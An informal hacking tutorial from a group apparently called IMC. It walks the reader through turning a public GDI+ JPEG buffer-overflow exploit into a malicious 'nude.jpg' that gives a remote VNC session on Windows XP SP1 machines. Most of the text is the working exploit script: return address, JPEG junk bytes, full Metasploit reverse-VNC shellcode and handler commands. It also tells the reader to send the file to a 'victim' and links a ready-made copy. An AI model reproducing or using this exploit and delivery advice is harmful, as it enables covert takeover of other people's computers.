Intro to Buffer Overflows - A whitepaper demonstrating a buffer overflow on a Windows XP SP1 box using Backtrack 3 Beta.
7eee601d3a61af58f41eee3b233daabac27cbb59bda1011826f01dafdda38592
Intro to Buffer Overflows
By IMC Tullywacker
Shouts
IMC GrahamPhisher
IMC EXE
IMC TwiZted
IMC PhirePhreak
Insanemasterminds.com
GrahamPhisher.com
remote-exploit.org
Hello, today I am going to be showing you how to perform a buffer overflow on a windows xp sp1 box. I
am going to be using Backtrack 3 beta as should you to be able to follow along easily.
If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial.
http://en.wikipedia.org/wiki/Buffer_overflow
Ok lets begin, fire up backtrack.
Open up a new terminal.
Code:
cd /pentest/exploits/milw0rm
ok now lets search the sploitlist for GDI exploits
Code:
cat sploitlist.txt |grep -i GDI
ok now copy the 475.sh sploit to the /tmp/ directory
Code:
cp ./platforms/windows/remote/475.sh /tmp/
now lets edit the file to better suit our needs.
Code:
nano /tmp/475.sh
We need to edit the address of the shellcode for a windows xp sp1 english so comment the 1st line and uncomment the
2nd like so
Code:
#********************************************
#Address of shellcode
#********************************************
#printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0
Next there are formatting problems in the image junk section that need to be corrected
Code:
#********************************************
#Image junk here...fake JPG
#********************************************
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";
Now lets edit the shellcode area we need to replace \xCC with a NOP (\x90) and fix another formatting issue
Code:
#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it works!
Ok next fix yet another formatting issue
Code:
#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
Now the original purpose for this exploit is to add an administrator to the users group as you can see from the line
above. We are going to be using a reverse vnc connection because a nice GUI is always the most fun.
You can do it if you want just to see that the sploit works, but here at IMC we strive to do shit differently Smiley
Now cd the framework2 directory
Code:
cd /pentest/exploits/framework2
To view all the payloads type
Code:
../msfpayload
We're going to use the win32_reverse_vncinject payload
Now to see what variables are needed to be set we type
Code:
../msfpayload win32_reverse_vncinject
As you can see the only field left blank is the LHOST option so we need our lan ip address
Code:
ifconfig
Code:
inet addr:192.168.1.113
Now we need to get our custom payload and put it into our sploit
Code:
../msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P
This will return the payload that is suited for our needs.
Here's mine
Code:
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
"\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
"\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
"\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";
So copy your payload and now lets put it in our sploit
Code:
nano /tmp/475.sh
Code:
#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";
Now we need to set up our payload handler
Code:
../msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102
Now you need to make your sploit into a .jpg file
Code:
cd /tmp/
Code:
chmod +x 475.sh
Code:
../475.sh > nude.jpg
Now what your going to do is give the victim the file, email, share, whatever up to u.
All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file, they
dont even have to open it! This will spawn a vnc session and give you a gui of the computer.
Congrats on making your 1st malicious jpg file.
For all you lazy people ive uploaded the modified sploit all you have to do is change the payload
Code:
http://imctully.hostaim.com/maliciousjpg.txt
~Tully